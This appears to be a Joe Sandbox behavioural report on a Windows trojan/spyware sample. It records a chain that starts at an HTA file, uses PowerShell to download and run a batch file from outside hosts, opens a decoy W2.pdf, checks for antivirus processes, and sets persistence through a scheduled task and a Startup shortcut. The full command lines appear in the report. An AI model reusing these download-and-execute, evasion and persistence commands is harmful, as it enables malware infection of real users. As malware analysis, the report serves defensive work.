Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00DDE1F0	36_2_00DDE1F0
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00DEE144	36_2_00DEE144
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00DD22AD	36_2_00DD22AD
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00DF22A2	36_2_00DF22A2
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00E0A26E	36_2_00E0A26E
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00DEC624	36_2_00DEC624
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00E5C8A4	36_2_00E5C8A4
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00E0E87F	36_2_00E0E87F
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00E06ADE	36_2_00E06ADE
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00E42A05	36_2_00E42A05
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00E38BFF	36_2_00E38BFF
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00DECD7A	36_2_00DECD7A
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00DFCE10	36_2_00DFCE10
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00E07159	36_2_00E07159
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00DD9240	36_2_00DD9240
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00E65311	36_2_00E65311
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00DD96E0	36_2_00DD96E0
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00DF1704	36_2_00DF1704
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00DF1A76	36_2_00DF1A76
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00DF7B8B	36_2_00DF7B8B
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00DD9B60	36_2_00DD9B60
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00DF7DBA	36_2_00DF7DBA
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00DF1D20	36_2_00DF1D20
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00DF1FE7	36_2_00DF1FE7
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A38017	38_2_00A38017
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A1E1F0	38_2_00A1E1F0
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A2E144	38_2_00A2E144
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A322A2	38_2_00A322A2
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A122AD	38_2_00A122AD
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A4A26E	38_2_00A4A26E
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A2C624	38_2_00A2C624
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A9C8A4	38_2_00A9C8A4
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A4E87F	38_2_00A4E87F
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A46ADE	38_2_00A46ADE
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A82A05	38_2_00A82A05
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A78BFF	38_2_00A78BFF
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A2CD7A	38_2_00A2CD7A
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A3CE10	38_2_00A3CE10
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A47159	38_2_00A47159
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A19240	38_2_00A19240
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00AA5311	38_2_00AA5311
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A196E0	38_2_00A196E0
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A31704	38_2_00A31704
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A31A76	38_2_00A31A76
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A37B8B	38_2_00A37B8B
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A19B60	38_2_00A19B60
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A37DBA	38_2_00A37DBA
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A31D20	38_2_00A31D20
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A31FE7	38_2_00A31FE7

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: String function: 004062A3 appears 58 times
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: String function: 00A2FD52 appears 40 times
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: String function: 00DEFD52 appears 40 times
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: String function: 00A30DA0 appears 46 times
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: String function: 00DF0DA0 appears 46 times

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winHTA@70/102@0/2

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 36_2_00E441FA GetLastError,FormatMessageW,

36_2_00E441FA

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00E32010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	36_2_00E32010
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00E31A0B AdjustTokenPrivileges,CloseHandle,	36_2_00E31A0B
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A72010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	38_2_00A72010
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A71A0B AdjustTokenPrivileges,CloseHandle,	38_2_00A71A0B

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

16_2_004044A5

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 36_2_00E3DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

36_2_00E3DD87

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 16_2_004024FB CoCreateInstance,

16_2_004024FB

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 36_2_00E43A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

36_2_00E43A0E

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Downloads\W2.pdf

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8948:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7396:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5228:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6832:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i1dyulfu.oiu.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c2.bat""

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\c.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;$u='https://candwfarmsllc.com/c2.bat';$o=$env:TEMP + '\c2.bat';Invoke-WebRequest -Uri $u -OutFile $o;Start-Process -FilePath $o -NoNewWindow"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c2.bat""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1576,i,16045763869341166772,13330645250121151550,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exe
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 361684
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Approaches
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Korea" Measurement
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm U
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com Propose.com U
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & echo URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;$u='https://candwfarmsllc.com/c2.bat';$o=$env:TEMP + '\c2.bat';Invoke-WebRequest -Uri $u -OutFile $o;Start-Process -FilePath $o -NoNewWindow"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c2.bat""	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exe	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1576,i,16045763869341166772,13330645250121151550,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 361684
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Approaches
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Korea" Measurement
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm U
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com Propose.com U
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & echo URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
